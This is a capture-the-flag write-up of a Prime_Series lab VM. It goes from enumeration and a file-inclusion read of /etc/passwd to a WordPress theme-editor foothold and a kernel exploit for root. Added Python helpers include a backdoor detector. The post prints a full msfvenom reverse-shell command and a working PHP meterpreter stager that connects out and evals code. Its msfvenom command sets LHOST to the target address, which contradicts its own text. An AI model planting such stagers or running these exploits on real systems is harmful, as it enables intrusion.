Prime_Series lab: from enumeration to privilege escalation
2022-07-28 06:14:00 【cainsoftware】

After booting the lab VM, make sure its network adapter is set to NAT so it sits on the same 192.168.34.0/24 network as the Kali box.
The challenge only states that the target is on the same /24; its IP address is not given.
So the first step is an nmap scan to find the target's IP address and its open ports and services.

Nothing clever here: the target is 192.168.34.130 with two ports open, 22 (SSH) and 80 (HTTP), and the web server is Apache.

dirb: brute-force directories directly against the web root.

The results show it is a WordPress site.

Second dirb scan with -X .txt,.php: the -X option appends the listed extensions to every wordlist entry, so the scan also finds files ending in .txt and .php rather than only directories.

This turns up three files: image.php, index.php and secret.txt.
Visiting secret.txt gives a hint that something should be fuzzed, so wfuzz is the obvious tool: fuzz the GET parameter name on index.php directly.

There are far too many results, because every unknown parameter name returns the same page. Filter them with wfuzz's hide options (--hc to hide a status code, --hh to hide a response length) so that only responses differing from the baseline remain.

What remains is a parameter called file. Add it to the request and revisit the page.

Note the difference from before: the earlier hint concerned a .txt file, meaning that once the parameter is found, the value to request through it is a text file such as location.txt. So try file=location.txt.

The response reveals another parameter name: secrettier360. (Is this the 360 company sending target machines abroad? The theory doesn't hold up.)

Supplying that parameter to image.php gives an unauthorised file read (a local file inclusion): passing the path of the system's passwd file (/etc/passwd) returns its contents, and one line in the file is a hint pointing at a directory (screenshot not preserved).
Browse to that directory.
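The two manual steps above (spotting the parameter wfuzz finds, then reading /etc/passwd through the LFI) as an added example in Python. This is not code from the original writeup; the response table and the passwd body below are constructed samples, and the hint line in the sample is invented, not the one from the lab.

```python
"""Recon helpers for the LFI step: baseline-diff parameter discovery and
passwd triage. Added example; all inputs are constructed, not captured."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


def fuzz_outliers(responses: Dict[str, Tuple[int, int]],
                  baseline: Tuple[int, int]) -> List[str]:
    """Return parameter names whose (status, body length) differs from the
    baseline produced by a nonsense parameter. This is what wfuzz's --hc/--hh
    do: hide whatever every miss has in common so only the hit remains."""
    return sorted(name for name, sig in responses.items() if sig != baseline)


# Seven colon-separated fields; uid and gid must be numeric.
PASSWD_RE = re.compile(r'^([^:]*):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$')
NOLOGIN_SHELLS = {'/usr/sbin/nologin', '/sbin/nologin', '/bin/false', '/bin/sync'}


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(body: str) -> Tuple[List[PasswdEntry], List[str]]:
    """Split a passwd body into well-formed entries and 'oddities': lines that
    are not valid passwd records. In a CTF the oddity is the hint; on a real
    host it may be an operator note or a planted line worth a second look."""
    entries, oddities = [], []
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PASSWD_RE.match(line)
        if m:
            name, _pw, uid, gid, _gecos, home, shell = m.groups()
            entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
        else:
            oddities.append(line)
    return entries, oddities


def login_users(entries: List[PasswdEntry]) -> List[PasswdEntry]:
    """Accounts worth chasing next: root and real users (uid >= 1000) that
    still have an interactive shell; their home directories are the targets."""
    return [e for e in entries
            if e.shell not in NOLOGIN_SHELLS and (e.uid == 0 or e.uid >= 1000)]


# Constructed sample: status and body length per fuzzed parameter name.
BASELINE = (200, 147)            # index.php?zzz=x, an unknown parameter
SAMPLE_RESPONSES = {
    'id': (200, 147),
    'page': (200, 147),
    'file': (200, 136),          # the only name that changes the page
    'q': (200, 147),
}

# Constructed sample passwd body with one non-record line acting as the hint.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
dev:x:1000:1000:dev,,,:/home/dev:/bin/bash
# todo - move the blog credentials out of /home/dev before go-live
"""

if __name__ == '__main__':
    print('parameter candidates:', fuzz_outliers(SAMPLE_RESPONSES, BASELINE))
    found, odd = parse_passwd(SAMPLE_PASSWD)
    print('login users:', [e.name for e in login_users(found)])
    print('oddities:', odd)
```

The same triage applies to any file the LFI returns: look for records that do not fit the format before reading the ones that do.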

That yields the key password: follow_the_ippsec.
It is the password for the WordPress admin login; the admin URL was already found by the earlier scan.
Two WordPress tools were used here, cmseek and wpscan; screenshots of each follow.

Running wpscan with -e u (enumerate users) lists the site's users.


So the login is user victor with password follow_the_ippsec.

Once logged in, the admin area's theme editor (Appearance > Theme Editor) lets you edit a theme's PHP files in place, which is the foothold.
Use msfvenom to generate a PHP reverse shell:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.34.130 lport=4444 -f raw -o shell2.php
Copy the generated code into a theme file. msfvenom's raw PHP output starts with /*<?php /**/; do not copy the leading /*, because anything before <?php is sent to the browser as plain text and the code would not execute. Also check LHOST: it must be the address of the machine that will run the listener (the Kali box), not the target.
<?php /**/
error_reporting(0);
$ip = '192.168.34.130';
$port = 4444;
/* pick whichever socket API the PHP build exposes */
if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; }
if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; }
if (!$s && ($f = 'socket_create') && is_callable($f)) {
    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
}
if (!$s_type) { die('no socket funcs'); }
if (!$s) { die('no socket'); }
/* the handler sends a 4-byte big-endian length, then the stage */
switch ($s_type) {
    case 'stream': $len = fread($s, 4); break;
    case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) { die(); }
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
/* execute the received stage; create_function is the fallback when suhosin blocks eval */
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
    $suhosin_bypass=create_function('', $b);
    $suhosin_bypass();
} else {
    eval($b);
}
die();
Save it into a theme file through the WordPress admin and wait for that page to be requested, which executes the shell.
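From the defender's side, the trick above leaves a PHP stager inside wp-content/themes/<theme>/ with a fresh modification time. The following is an added detection example, not code from the original writeup: it walks a theme directory, flags PHP files containing the stager's fingerprints (eval of a variable, an outbound socket call, error_reporting(0), create_function) and flags any PHP file modified well after the theme's own style.css. The sample theme it builds in a temp directory is constructed, including the planted 404.php.

```python
"""Scan a WordPress theme directory for theme-editor backdoors.
Added example; the sample theme is constructed in a temp dir."""
import os
import re
import tempfile
import time
from typing import Dict, List

# Fingerprints of the pasted stager (and of most PHP stagers and web shells).
INDICATORS = {
    'eval_of_variable': re.compile(r'\beval\s*\(\s*\$\w+\s*\)'),
    'outbound_socket': re.compile(r'\b(stream_socket_client|fsockopen|socket_create)\s*\('),
    'errors_silenced': re.compile(r'\berror_reporting\s*\(\s*0\s*\)'),
    'dynamic_function': re.compile(r'\bcreate_function\s*\('),
}


def scan_file(path: str) -> List[str]:
    """Names of the indicators present in one file."""
    with open(path, encoding='utf-8', errors='replace') as fh:
        src = fh.read()
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_theme(theme_dir: str, slack_seconds: int = 60) -> Dict[str, List[str]]:
    """Map relative path -> findings for every suspicious .php file.
    style.css is written when the theme is installed and is rarely edited,
    so a PHP file much newer than it is an edit made after install."""
    findings: Dict[str, List[str]] = {}
    style = os.path.join(theme_dir, 'style.css')
    ref_mtime = os.path.getmtime(style) if os.path.exists(style) else None
    for root, _dirs, files in os.walk(theme_dir):
        for fn in files:
            if not fn.endswith('.php'):
                continue
            path = os.path.join(root, fn)
            hits = scan_file(path)
            if ref_mtime is not None and os.path.getmtime(path) > ref_mtime + slack_seconds:
                hits.append('modified_after_theme_install')
            if hits:
                findings[os.path.relpath(path, theme_dir)] = hits
    return findings


def build_sample_theme() -> str:
    """Constructed theme: an old style.css and functions.php, plus a 404.php
    overwritten just now with a stager-like body (the attacker's edit)."""
    theme = tempfile.mkdtemp(prefix='theme-')
    installed = time.time() - 30 * 86400   # installed a month ago

    def write(name: str, content: str, mtime=None) -> None:
        path = os.path.join(theme, name)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(content)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

    write('style.css', '/*\nTheme Name: Sample\n*/\n', installed)
    write('functions.php',
          "<?php\nadd_action('init', function () { /* legitimate theme code */ });\n",
          installed)
    write('404.php',
          "<?php /**/ error_reporting(0); $ip = '10.0.0.1'; $port = 4444;\n"
          "$s = stream_socket_client(\"tcp://{$ip}:{$port}\");\n"
          "$len = fread($s, 4); $b = fread($s, 4096); eval($b);\n")
    return theme


if __name__ == '__main__':
    for rel, hits in scan_theme(build_sample_theme()).items():
        print(rel, '->', ', '.join(hits))
```

A plain `diff` against a clean copy of the same theme version is the stronger check when one is available; the indicator scan is for the case where no known-good copy exists.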

The file location is 
In Metasploit, set up the handler (exploit/multi/handler) with the same payload, LHOST and LPORT used for the shell.
Start listening.
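What the listener and the pasted stager actually exchange, as an added example not taken from the original post: the handler sends a 4-byte big-endian length followed by the stage, and the PHP reads exactly 4 bytes, unpacks them with "N", then loops until it has the full stage and eval()s it. The Python below reproduces both sides over a local socketpair so it runs offline; the stage string is a harmless constructed placeholder, and the prefix-stripping helper covers the /* caveat from the msfvenom step.

```python
"""Stager/handler framing of the PHP reverse shell, both sides in Python.
Added example; the stage payload is a constructed placeholder."""
import socket
import struct


def strip_msfvenom_prefix(raw: str) -> str:
    """msfvenom -f raw for PHP emits '/*<?php /**/ ...'. Anything before
    '<?php' is served to the browser as text, so drop the leading '/*'."""
    idx = raw.find('<?php')
    return raw[idx:] if idx > 0 else raw


def frame_stage(stage: bytes) -> bytes:
    """Handler side: 4-byte big-endian length, then the stage.
    The PHP reads this with unpack('Nlen', ...)."""
    return struct.pack('>I', len(stage)) + stage


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes, tolerating short reads, like the PHP
    while (strlen($b) < $len) loop."""
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('peer closed mid-frame')
        buf += chunk
    return buf


def read_stage(sock: socket.socket) -> bytes:
    """Stager side: mirror of fread($s, 4) followed by the length loop."""
    (length,) = struct.unpack('>I', recv_exact(sock, 4))
    return recv_exact(sock, length)


def demo_roundtrip(stage: bytes) -> bytes:
    """Push a framed stage through a socketpair and read it back, sending
    it in two pieces to show that the length loop handles partial reads."""
    handler, stager = socket.socketpair()
    try:
        framed = frame_stage(stage)
        handler.sendall(framed[:3])
        handler.sendall(framed[3:])
        return read_stage(stager)
    finally:
        handler.close()
        stager.close()


if __name__ == '__main__':
    print(demo_roundtrip(b'echo "stage would run here";'))
```

The stage never touches disk: forensics on the edited theme file recovers only the stager, while the meterpreter code exists in memory and on the wire. Detection therefore has to look at outbound connections from the web server or at the running PHP process, not only at files.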

The shell comes back successfully as www-data, a low-privilege account; the OS is Ubuntu with a 4.15 kernel.
Use Metasploit (or searchsploit) to look for a matching exploit.
The search shows this PoC fits the current environment:

45010.c (Exploit-DB 45010, a local privilege escalation through the eBPF verifier bug CVE-2017-16995)
It is a .c file, so it has to be compiled with gcc: locate it on Kali, copy it out and compile it. Build for the target's architecture; if the target has gcc, compiling there avoids libc mismatches.

Upload the compiled binary to the target and run it.
Privilege escalation to root succeeds.

This VM can only be hit once: the PoC triggers a kernel memory corruption, and a failed attempt leaves the kernel unstable or panicked, so kernel exploits are unwelcome anywhere but a lab. Here is a screenshot of the earlier run, which worked without problems.